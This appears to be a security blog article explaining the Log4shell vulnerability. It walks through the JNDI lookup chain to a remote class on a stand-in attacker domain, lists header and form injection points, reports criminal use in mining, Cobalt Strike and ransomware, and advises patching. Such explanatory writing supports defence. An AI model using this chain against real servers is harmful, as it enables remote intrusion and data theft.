Figure 1: Log4shell exploitation worldwide (by ESET).
How the Log4shell vulnerability works
Here is the modus operandi of the Log4shell vulnerability:
The data from the user is sent to the remote server via any protocol. The server logs the requested data, which includes the malicious payload:
The pre-computed payload, which is available on the domain controlled by the attacker (attacker.example.com), activates the log4j vulnerability in the remote server that sends a request to the attacker domain via the Java naming and directory interface (JNDI) protocol. From this point, the attacker can control the response and include a URL to a remote Java class file (http:/attacker.example.com/payload2.class) that will be injected into the server process. The second stage (payload2) is triggered by the injected payload, which allows an attacker to execute arbitrary code (e.g., a remote shell).
The high-level diagram of this vulnerability is presented in Figure 2 below.
Figure 2: High-level diagram of Log4shell vulnerability. Hackers can test if the vulnerability exists and whether it can even be exploited at any input point where the external user is allowed to enter data. Among those points are input fields, user and password login forms, HTTP headers such as User-Agent, X-Forwarded-For, or other custom headers. In the example illustrated in Figure 2 above, we highlighted the user-agent HTTP header as an example.
How criminals are exploiting Log4shell
This vulnerability is being actively exploited in the wild by cybercriminals. It is a remote code execution (RCE) flaw, one of the most dangerous vulnerability types because it allows remote attackers to fully control servers over the Internet. From a 360º perspective, it was established that cybercriminals focus on installing cryptocurrency mining and, more recently, installing Cobalt Strike for credential theft, lateral movement, and data exfiltration from compromised systems. Finally, the deployment of ransomware has been noticed as the last stage of the malicious chain.
Figure 3: Conti Ransomware Log4Shell Operation.
Final thoughts and recommendations on the Log4shell vulnerability
Log4shell vulnerability is a severe vulnerability that can impact several organizations worldwide. Criminals can take advantage of this flaw to gain access to the companies’ internal assets and put the entire company’s secrets and infrastructure at risk – for instance, by stealing their data and deploying a ransomware attack. In order to prevent these kinds of scenarios, patches to meditate this vulnerability should be applied, depending on the affected version. In addition, the flaw can be easily detected by using a specially crafted payload.
Sources:
log4shell initial access, advintel Log4shell explanation, UpGuard What is Log4shell, Dynatrace
